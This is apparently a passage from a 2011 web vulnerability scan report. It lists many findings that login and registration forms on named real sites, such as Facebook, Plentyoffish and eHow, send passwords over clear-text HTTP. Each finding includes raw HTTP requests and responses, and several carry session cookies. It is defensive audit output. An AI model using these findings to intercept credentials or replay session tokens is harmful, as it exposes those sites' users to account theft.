User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.7. http://it.toolbox.com/blogs/elsua previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/elsua

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://it.toolbox.com/blogs/elsua

The form contains the following password field:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/elsua HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.8. http://it.toolbox.com/blogs/juice-analytics previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/juice-analytics

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://it.toolbox.com/blogs/juice-analytics

The form contains the following password field:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/juice-analytics HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.9. http://it.toolbox.com/blogs/minimalit previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/minimalit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://it.toolbox.com/blogs/minimalit

The form contains the following password field:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/minimalit HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.10. http://it.toolbox.com/blogs/penguinista-databasiensis previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/penguinista-databasiensis

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://it.toolbox.com/blogs/penguinista-databasiensis

The form contains the following password field:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/penguinista-databasiensis HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.11. http://it.toolbox.com/blogs/ppmtoday previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/ppmtoday

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://it.toolbox.com/blogs/ppmtoday

The form contains the following password field:

ctl00$ctl00$m$txtSignin_Password

Request

GET /blogs/ppmtoday HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.12. http://wp-superslider.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://wp-superslider.com/site/wp-login.php

The form contains the following password field:

Request

GET / HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:42:50 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Set-Cookie: bb2_screener_=1296661370+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296661370; expires=Thu, 02-Feb-2012 15:42:50 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...

               <form class="clearfix test" action="http://wp-superslider.com/site/wp-login.php" method="post">

                   <fieldset>
...[SNIP]...
</label>
                   <input class="field" type="password" name="pwd" id="pwd" size="23" />
       <label style="display:none;">
...[SNIP]...

5.13. http://www.astaro.org/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.astaro.org
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.astaro.org/login.php?do=login

The form contains the following password field:

vb_login_password

Request

GET / HTTP/1.1
Host: www.astaro.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:30:20 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: bblastvisit=1296570620; expires=Wed, 01-Feb-2012 14:30:20 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Wed, 01-Feb-2012 14:30:20 GMT; path=/
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
X-UA-Compatible: IE=7
Set-Cookie: vbseo_loggedin=deleted; expires=Mon, 01-Feb-2010 14:30:20 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 70307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <!-
...[SNIP]...

       <form action="http://www.astaro.org/login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
       <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=386">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

5.14. http://www.ehow.com/account/simple_login.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/account/simple_login.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.ehow.com/account/simple_login.aspx?afterLogin=

The form contains the following password field:

user_password

Request

GET /account/simple_login.aspx HTTP/1.1
Host: www.ehow.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; google-autocomplete=autocomplete; oml=direct; oms=homepage; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=101451733.743339175.1296659524.1296659524.1296659524.1; __utmc=101451733; __utmb=101451733.1.10.1296659524; rsi_segs=; _dt=ts

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Wed, 02 Feb 2011 15:11:29 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 7187

<!DOCTYPE html>
<html id="www-ehow-com">
   <head>
       <title>Sign in to your eHow Account</title>
       <meta name="siteid" scheme="DMINSTR2" content="EHWC" />
       <meta name="pagetype" scheme="DMINSTR2
...[SNIP]...
</p>

                   <form action="http://www.ehow.com/account/simple_login.aspx?afterLogin=" method="post">

                    <fieldset>
...[SNIP]...
</label>
                           <input type="password" id="simplePwd" name="user_password" value="" />
                           <div class="note">
...[SNIP]...

5.15. http://www.ehow.com/account/simple_register.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/account/simple_register.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.ehow.com/account/simple_register.aspx

The form contains the following password fields:

password
password2

Request

GET /account/simple_register.aspx HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:44:46 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 21956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
   <head>
       <title>Register fo
...[SNIP]...
</p>

           <form name="simpleForm" method="post" action="simple_register.aspx" id="simpleForm">
<div>
...[SNIP]...
</label>
                       <input type="password" name="password" value="" id="simplePwd" />
                   </div>
...[SNIP]...
</label>
                    <input type="password" name="password2" value="" id="simpleConfirmPwd" />
                       </div>
...[SNIP]...

5.16. http://www.evow.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.evow.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.evow.com/home.aspx

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: www.evow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.17. http://www.evow.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.evow.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.evow.com/default.aspx

The form contains the following password fields:

ffvhekhe
Passwordconfirm

Request

GET / HTTP/1.1
Host: www.evow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kilngtaxq5jnnjw2w0xslwyy; path=/; HttpOnly
Set-Cookie: ft=Monday, January 31, 2011 5:34:04 PM; expires=Sat, 19-Jun-2038 00:34:04 GMT; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 01:34:04 GMT
Connection: close
Content-Length: 36895

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>eVow Online
...[SNIP]...
<div id="registration" class="WhiteSM">
<form action="default.aspx" method="post" onsubmit="generateTimeStamp(); return validateForm();">
<script type="text/javascript">
...[SNIP]...
<td class="field">
<input name="ffvhekhe" id="ffvhekhe" class="tb" type="password" value="" onblur="if (registrationValid.vEmpty(this) && registrationValid.vPassword(this, 0x00000005)) showConfirmationTick($(Password), ''); else hideConfirmationTick($(Password), ''); if (registrationValid.vValMatch(this, $(Passwordconfirm), 'Passwords')) showConfirmationTick($(Passwordconfirm), ''); else hideConfirmationTick($(Passwordconfirm), '');"/>
<input name="Password" id="Password_signup" type="hidden" value="ffvhekhe" />
...[SNIP]...
<td class="field">
<input name="Passwordconfirm" id="Passwordconfirm" value="" class="tb" type="password"
onblur= "if(registrationValid.vEmpty(this) && registrationValid.vPassword(this, 0x00000005) && registrationValid.vValMatch(this, $(ffvhekhe), 'Passwords')) showConfirmationTick($(Passwordconfirm), ''); else hideConfirmationTick($(Passwordconfirm), '');"/></td>
...[SNIP]...

5.18. http://www.facebook.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.facebook.com/

The form contains the following password field:

reg_passwd__

Request

GET / HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=J5foX; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Wed, 02 Feb 2011 21:51:01 GMT
Content-Length: 30789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event){return false;}.call(this,event)!==false && Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" id="reg_instance" name="reg_instance" value="xNFJTYJu7tPBzUkyTEn2Ng8E" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

5.19. http://www.facebook.com/r.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/r.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.facebook.com/r.php?possible_fb_user=1&app_id=0&is_enabled=1&next=&locale=en_US

The form contains the following password field:

reg_passwd__

Request

GET /r.php?possible_fb_user=1&app_id=0&is_enabled=1&next=&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsd=ErPUD; reg_fb_gate=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF; reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1

Response

5.20. http://www.plentyoffish.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.plentyoffish.com/inbox.aspx

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: www.plentyoffish.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw; ft=Monday, January 31, 2011 5:25:37 PM; my_ipcountry=1; __utmx=9489908.00012890560422417014:1:0-1-1-0; __utmxx=9489908.00012890560422417014:3738426:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; __utmc=9489908; __utmb=9489908.5.10.1296523584

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 01 Feb 2011 01:29:02 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 43002

<html><head><title>
Free Online Dating at Plentyoffish.com™</title>
<META HTTP-EQUIV="Content-Language" CONTENT="EN">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1
...[SNIP]...
<div class='tsbheader5b'>
<form action="inbox.aspx#in" method="post" name="frmLogind">
<table border=0 cellspacing=0 cellpadding=0 background="transparent" align=right >
...[SNIP]...
<td align=center><input type=password style="width:75px" name=password size=8 ></td>
...[SNIP]...

5.21. http://www.plentyoffish.com/inbox.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/inbox.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.plentyoffish.com/inbox.aspx?Guid=&SID=#in

The form contains the following password field:

password

Request

GET /inbox.aspx HTTP/1.1
Host: www.plentyoffish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:29:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22398

<html><head><title>Online Dating Service, Meet Singles, Matchmaking</title>
<META HTTP-EQUIV="Content-Language" CONTENT="EN"><meta http-equiv="Content-Type" content="text/html; charset=windows-12
...[SNIP]...
<td >

   <form action="inbox.aspx?Guid=&SID=#in" method="post" name="frmLogin" >

       <table cellspacing="0" cellpadding="0" bgcolor="#CDE3EE" style="border: 1px solid #9BACB4;" align="center">
...[SNIP]...
<td align="center"><input type="password" name="password" size="8" style="width:75px">

</td>
...[SNIP]...

5.22. http://www.plentyoffish.com/meetme.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/meetme.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.plentyoffish.com/?SID=enhftrh2rwh40ylxbcdqkhlw

The form contains the following password field:

password

Request

GET /meetme.aspx HTTP/1.1
Host: www.plentyoffish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:29:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4311

<html><head><title>Find Singles with Plentyoffish FREE Online Dating Personals Service</title>

<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
       <META HTTP-EQUIV="PRAGMA" CONTENT="N
...[SNIP]...
</a> and find singles who are looking to meet other quality singles for dating, love, and a relationship!

   <form action="?SID=enhftrh2rwh40ylxbcdqkhlw" method="post" name="frmLogin" >

        <table cellspacing="0" cellpadding="0" bgcolor="#CDE3EE" style="border: 1px solid #9BACB4;" align="center">
...[SNIP]...
<td align="center"><input type="password" name="password" size="8" style="width:75px"></td>
...[SNIP]...

5.23. http://www.plentyoffish.com/needs_test.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/needs_test.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.plentyoffish.com/?SID=enhftrh2rwh40ylxbcdqkhlw

The form contains the following password field:

password

Request

GET /needs_test.aspx HTTP/1.1
Host: www.plentyoffish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:29:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6085

<html><head><title>100% Free Relationship Needs Assessment</title>

<META name="description" content="A Free Relationship test that measures your needs in a relationship.">
<meta name="KEYW
...[SNIP]...
<td>

   <form action="?SID=enhftrh2rwh40ylxbcdqkhlw" method="post" name="frmLogin" >

        <table cellspacing="0" cellpadding="0" bgcolor="#CDE3EE" style="border: 1px solid #9BACB4;" align="center">
...[SNIP]...
<td align="center"><input type="password" name="password" size="8" style="width:75px"></td>
...[SNIP]...

5.24. http://www.plentyoffish.com/poftest.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/poftest.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.plentyoffish.com/?SID=enhftrh2rwh40ylxbcdqkhlw

The form contains the following password field:

password

Request

GET /poftest.aspx HTTP/1.1
Host: www.plentyoffish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:29:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9979

<html><head><title>100% Free Personality Relationship Chemistry Test</title>

<META name="description" content="A Free Personality test that measures relationship compatibility for singles.">
...[SNIP]...
<td>

   <form action="?SID=enhftrh2rwh40ylxbcdqkhlw" method="post" name="frmLogin" >

        <table cellspacing="0" cellpadding="0" bgcolor="#CDE3EE" style="border: 1px solid #9BACB4;" align="center">
...[SNIP]...
<td align="center"><input type="password" name="password" size="8" style="width:75px"></td>
...[SNIP]...

5.25. http://www.plentyoffish.com/seriousintro.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/seriousintro.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.plentyoffish.com/?SID=enhftrh2rwh40ylxbcdqkhlw

The form contains the following password field:

password

Request

GET /seriousintro.aspx HTTP/1.1
Host: www.plentyoffish.com
Proxy-Connection: keep-alive
Referer: http://www.plentyoffish.com/register.aspx
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw; ft=Monday, January 31, 2011 5:25:37 PM; my_ipcountry=1; __utmx=9489908.00012890560422417014:1:0-1-1-0; __utmxx=9489908.00012890560422417014:3738426:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; __utmc=9489908; __utmb=9489908.4.10.1296523584

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 01 Feb 2011 01:28:59 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 10030

<html><title>Plentyoffish.com - Changing The Online Dating Industry</title>

<html><head><title>Plentyoffish.com 100% Free Online Dating Service for singles</title>
<META HTTP-EQUIV="Conten
...[SNIP]...
<div class='tsbheader'>

<form action="?SID=enhftrh2rwh40ylxbcdqkhlw" method="post" name="frmLogin" >

<p>
...[SNIP]...
<td align="center"><input type="password" name="password" size="8" style="width:75px"></td>
...[SNIP]...

5.26. http://www.ratedesi.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ratedesi.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.ratedesi.com/login.php

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.ratedesi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 06:48:24 GMT
Server: Apache/2.2.16 (EL)
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=odm00hplmonq2l4mff2kcmq426; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta property="fb:admins" content="406321" />
<meta property="fb:page_id" content="3797
...[SNIP]...
<hr>
<FORM method="post" action="http://www.ratedesi.com/login.php">
<div class="element">
...[SNIP]...
<span><INPUT type="password" name="PW" class="text"></span>
...[SNIP]...

5.27. http://www.ratedesi.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ratedesi.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.ratedesi.com/signup.php

The form contains the following password fields:

Request

GET / HTTP/1.1
Host: www.ratedesi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 06:48:24 GMT
Server: Apache/2.2.16 (EL)
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=odm00hplmonq2l4mff2kcmq426; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta property="fb:admins" content="406321" />
<meta property="fb:page_id" content="3797
...[SNIP]...
<hr>
<FORM method="post" action="http://www.ratedesi.com/signup.php">
<div class="element">
...[SNIP]...
<span><INPUT type="password" name="PW1" class="text"></span>
...[SNIP]...
<span><INPUT type="password" name="PW2" maxlength="16" class="text"></span>
...[SNIP]...

5.28. http://www.reddit.com/domain/static.2mdn.net/new/x22 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.reddit.com
Path:	/domain/static.2mdn.net/new/x22

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.reddit.com/domain/static.2mdn.net/post/login

